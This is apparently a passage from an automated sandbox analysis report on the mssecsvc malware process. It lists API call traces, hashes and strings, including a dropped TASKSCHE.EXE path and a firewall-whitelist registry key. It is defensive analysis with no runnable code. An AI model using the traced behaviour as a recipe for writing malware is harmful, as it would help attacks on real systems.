                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate$MappingView
                                                                                • String ID:
                                                                                • API String ID: 1961427682-0
                                                                                • Opcode ID: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
                                                                                • Instruction ID: 5241e261c6a8b1a9cf08daa61a461fa69fc83fe37cd40be9c894cf7c8eac2c63
                                                                                • Opcode Fuzzy Hash: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
                                                                                • Instruction Fuzzy Hash: E62112B0205309BFEF219E658D45BFA366DAF01619F500229E91A9E0A4D7F5AF058728
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B905BA Relevance: 1.3, APIs: 1, Instructions: 7sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 280 b905ba-b905bd 281 b905c9 280->281 282 b905bf-b905c7 Sleep 280->282 282->280
                                                                                APIs
                                                                                • Sleep.KERNELBASE(0000000A,00B9085C,?,00000000,00000000,-00003C38,00000002,00000000,?,00000000), ref: 00B905C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
                                                                                • Instruction ID: e135fb134d8ba9db73add7f697db003abd3a6b7b4cc90aaea62a277f5739f2b8
                                                                                • Opcode Fuzzy Hash: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
                                                                                • Instruction Fuzzy Hash: F8B012382503009DDE14392044CEB0416E47F11B11FE100F9E2064C0C407E407001D09
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 7FEA3C3D Relevance: 46.0, APIs: 21, Strings: 5, Instructions: 487libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,00000104), ref: 7FEA3CA1
                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 7FEA3CD4
                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                • GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 7FEA3EE2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 1749273276-4180491618
                                                                                • Opcode ID: 11d8e70a6ae69d735f2b35264cad3f706a3a81fbd19f45a2bd40c521d43324e7
                                                                                • Instruction ID: 6856dd48e4ced1a9f2286be03aa6e2628cc93b41bccce76cbf3563a38adebb89
                                                                                • Opcode Fuzzy Hash: 11d8e70a6ae69d735f2b35264cad3f706a3a81fbd19f45a2bd40c521d43324e7
                                                                                • Instruction Fuzzy Hash: 10020571419348BFEB229F748C4ABEA7BACEF41304F004559EC4A9E081D7F66F4597A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B93C3D Relevance: 46.0, APIs: 21, Strings: 5, Instructions: 487libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,00000104), ref: 00B93CA1
                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 00B93CD4
                                                                                • GetProcAddress.KERNEL32(00000000,00B93D41), ref: 00B93D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B93D5F
                                                                                • GetTickCount.KERNEL32 ref: 00B93D93
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B96EF6,00000000,00000000,00000000,00000000), ref: 00B93E65
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 00B93EE2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 1749273276-4180491618
                                                                                • Opcode ID: 11d8e70a6ae69d735f2b35264cad3f706a3a81fbd19f45a2bd40c521d43324e7
                                                                                • Instruction ID: 5aaf2a18cdc2c8cb1b98dfdf0ceeb045181aa75daaead9e4e1659f2d8af62cae
                                                                                • Opcode Fuzzy Hash: 11d8e70a6ae69d735f2b35264cad3f706a3a81fbd19f45a2bd40c521d43324e7
                                                                                • Instruction Fuzzy Hash: 1A020571418258BFEF259F248C4ABEA7BECEF41700F0045A9EC499E082D7F45F4687A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA3CC2 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 432libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(7FEA3CBA), ref: 7FEA3CC2
                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 7FEA3CD4
                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                • GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountHandleLibraryLoadModuleTick
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 2837544101-4180491618
                                                                                • Opcode ID: a6ecbdba0e77da1c42fb1fb22e58a019832077429085a03e12af027fb64ba546
                                                                                • Instruction ID: b4b3212d39e947ac5d9392814a2c7224f35c85923ea667b823aff5088932c5b3
                                                                                • Opcode Fuzzy Hash: a6ecbdba0e77da1c42fb1fb22e58a019832077429085a03e12af027fb64ba546
                                                                                • Instruction Fuzzy Hash: 45E11371519348BFEB229F708C4ABFA7BACEF41304F004559EC4A9E081D6F66F059762
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B93CC2 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 432libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00B93CBA), ref: 00B93CC2
                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 00B93CD4
                                                                                • GetProcAddress.KERNEL32(00000000,00B93D41), ref: 00B93D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B93D5F
                                                                                • GetTickCount.KERNEL32 ref: 00B93D93
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountHandleLibraryLoadModuleTick
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 2837544101-4180491618
                                                                                • Opcode ID: a6ecbdba0e77da1c42fb1fb22e58a019832077429085a03e12af027fb64ba546
                                                                                • Instruction ID: 5a5eb340fa4b68033d6b5d1c852d35b2d7173fe9669561a3b123735a046d1d28
                                                                                • Opcode Fuzzy Hash: a6ecbdba0e77da1c42fb1fb22e58a019832077429085a03e12af027fb64ba546
                                                                                • Instruction Fuzzy Hash: 2CE12271518258BFEF259F648C4ABEA7BECEF42700F0045A9EC499E082D7F45F4687A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA3CF0 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 409COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(7FEA3CE5), ref: 7FEA3CF0
                                                                                • GetSystemDirectoryA.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,00000104), ref: 7FEA3D07
                                                                                  • Part of subcall function 7FEA3D1F: lstrcat.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,7FEA3D12), ref: 7FEA3D20
                                                                                  • Part of subcall function 7FEA3D1F: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                  • Part of subcall function 7FEA3D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                  • Part of subcall function 7FEA3D1F: GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                  • Part of subcall function 7FEA3D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 215653160-4180491618
                                                                                • Opcode ID: cd28a5bb51607502b6a1d28e904626137af5b7f109cbf1ae294eaab79654ac09
                                                                                • Instruction ID: 7541589ca8aef85322091197c42534de99d7bca435932005a89768fd23254656
                                                                                • Opcode Fuzzy Hash: cd28a5bb51607502b6a1d28e904626137af5b7f109cbf1ae294eaab79654ac09
                                                                                • Instruction Fuzzy Hash: 4CE1F171409348BFEB229F708C4ABFA7BACEF42304F004559EC4A9E091D6F66F0597A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B93CF0 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 409COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00B93CE5), ref: 00B93CF0
                                                                                • GetSystemDirectoryA.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,00000104), ref: 00B93D07
                                                                                  • Part of subcall function 00B93D1F: lstrcat.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,00B93D12), ref: 00B93D20
                                                                                  • Part of subcall function 00B93D1F: GetProcAddress.KERNEL32(00000000,00B93D41), ref: 00B93D4C
                                                                                  • Part of subcall function 00B93D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B93D5F
                                                                                  • Part of subcall function 00B93D1F: GetTickCount.KERNEL32 ref: 00B93D93
                                                                                  • Part of subcall function 00B93D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B96EF6,00000000,00000000,00000000,00000000), ref: 00B93E65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 215653160-4180491618
                                                                                • Opcode ID: cd28a5bb51607502b6a1d28e904626137af5b7f109cbf1ae294eaab79654ac09
                                                                                • Instruction ID: f82e2ce4fe6cc6181cfee966d41e6a2f487ea47cc7f754acf2db8160a9078b84
                                                                                • Opcode Fuzzy Hash: cd28a5bb51607502b6a1d28e904626137af5b7f109cbf1ae294eaab79654ac09
                                                                                • Instruction Fuzzy Hash: C3E11271418258BFEF259F648C4ABEA3BECEF42700F0045A9EC499E082D7F45F468765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA3D1F Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 389stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcat.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,7FEA3D12), ref: 7FEA3D20
                                                                                  • Part of subcall function 7FEA3D36: LoadLibraryA.KERNEL32(7FEA3D2B), ref: 7FEA3D36
                                                                                  • Part of subcall function 7FEA3D36: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                  • Part of subcall function 7FEA3D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                  • Part of subcall function 7FEA3D36: GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                  • Part of subcall function 7FEA3D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 2038497427-4180491618
                                                                                • Opcode ID: 5a76be44ed4f92b9dccb11bf418610a86d6d8c7d9316cc10d01e71e8a6162f38
                                                                                • Instruction ID: aa1c8551e8f76fbb525208f0bea2f920101e632125f5267fb1ed65396364aa08
                                                                                • Opcode Fuzzy Hash: 5a76be44ed4f92b9dccb11bf418610a86d6d8c7d9316cc10d01e71e8a6162f38
                                                                                • Instruction Fuzzy Hash: A2E1F071419348BFEB229F748C4ABFA7BACEF42304F004559E84A9E081DAF66F059765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B93D1F Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 389stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcat.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,00B93D12), ref: 00B93D20
                                                                                  • Part of subcall function 00B93D36: LoadLibraryA.KERNEL32(00B93D2B), ref: 00B93D36
                                                                                  • Part of subcall function 00B93D36: GetProcAddress.KERNEL32(00000000,00B93D41), ref: 00B93D4C
                                                                                  • Part of subcall function 00B93D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B93D5F
                                                                                  • Part of subcall function 00B93D36: GetTickCount.KERNEL32 ref: 00B93D93
                                                                                  • Part of subcall function 00B93D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B96EF6,00000000,00000000,00000000,00000000), ref: 00B93E65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 2038497427-4180491618
                                                                                • Opcode ID: 5a76be44ed4f92b9dccb11bf418610a86d6d8c7d9316cc10d01e71e8a6162f38
                                                                                • Instruction ID: 51aea7d4b847c95fae2948d450aaddc5b0c08c45118b9c7d98ec51197e6b56e6
                                                                                • Opcode Fuzzy Hash: 5a76be44ed4f92b9dccb11bf418610a86d6d8c7d9316cc10d01e71e8a6162f38
                                                                                • Instruction Fuzzy Hash: 73E11271918258BFEF259F648C4ABEA3BECEF02700F0045A9EC499E082D7F45F468765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA3D36 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 379libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(7FEA3D2B), ref: 7FEA3D36
                                                                                  • Part of subcall function 7FEA3D4B: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                  • Part of subcall function 7FEA3D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                  • Part of subcall function 7FEA3D4B: GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                  • Part of subcall function 7FEA3D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolume
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 3734769084-4180491618
                                                                                • Opcode ID: 6ab2b3c950b056d37b1ed1d631e5db56a4483ae6f253cbb068636a664c233e13
                                                                                • Instruction ID: 04a7c8116a9fb35f71bbffa2808c6274a5c5ffd0f068440cbef2dd7623ef1827
                                                                                • Opcode Fuzzy Hash: 6ab2b3c950b056d37b1ed1d631e5db56a4483ae6f253cbb068636a664c233e13
                                                                                • Instruction Fuzzy Hash: 9DD10071419348BFEB229F748C4ABFA7BACEF41304F004519E84A9E091DBF66F059765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B93D36 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 379libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00B93D2B), ref: 00B93D36
                                                                                  • Part of subcall function 00B93D4B: GetProcAddress.KERNEL32(00000000,00B93D41), ref: 00B93D4C
                                                                                  • Part of subcall function 00B93D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B93D5F
                                                                                  • Part of subcall function 00B93D4B: GetTickCount.KERNEL32 ref: 00B93D93
                                                                                  • Part of subcall function 00B93D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B96EF6,00000000,00000000,00000000,00000000), ref: 00B93E65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolume
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 3734769084-4180491618
                                                                                • Opcode ID: 6ab2b3c950b056d37b1ed1d631e5db56a4483ae6f253cbb068636a664c233e13
                                                                                • Instruction ID: a52d58ca4f311da731e87a8ae5949c8655b0e5e7268b4affabcb93b1af76feb4
                                                                                • Opcode Fuzzy Hash: 6ab2b3c950b056d37b1ed1d631e5db56a4483ae6f253cbb068636a664c233e13
                                                                                • Instruction Fuzzy Hash: 86D10F71918258BFEF35AF648C4ABEA3BECEF01700F0045A9E8499E082D7F45F468765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA3D4B Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 386librarythreadnetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                • GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 7FEA3EE2
                                                                                • wsprintfA.USER32 ref: 7FEA3EF7
                                                                                • CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                                                                                • CloseHandle.KERNEL32(?,6EF1083C), ref: 7FEA3F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                • SetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA42D6
                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 7FEA42F7
                                                                                • ResetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA430A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 1567941233-4180491618
                                                                                • Opcode ID: 8f5bda587157e99726d781c634e3378632d432898dcbe4ad85f90d404c80ec81
                                                                                • Instruction ID: 0fd1af5c82e6ac19fee7a4e27b5b7e3d4aaa516ddc9e53bac77035a7f4224d32
                                                                                • Opcode Fuzzy Hash: 8f5bda587157e99726d781c634e3378632d432898dcbe4ad85f90d404c80ec81
                                                                                • Instruction Fuzzy Hash: BBE1EF71419348BFEB229F748C4ABFA7BACEF41304F00465AEC4A9E081D6F66F059761
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B93D4B Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 386librarythreadnetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,00B93D41), ref: 00B93D4C
                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B93D5F
                                                                                • GetTickCount.KERNEL32 ref: 00B93D93
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B96EF6,00000000,00000000,00000000,00000000), ref: 00B93E65
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 00B93EE2
                                                                                • wsprintfA.USER32 ref: 00B93EF7
                                                                                • CreateThread.KERNEL32(00000000,00000000,00B93691,00000000,00000000), ref: 00B93F40
                                                                                • CloseHandle.KERNEL32(?,6EF1083C), ref: 00B93F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B93FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00B93FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B93FFF
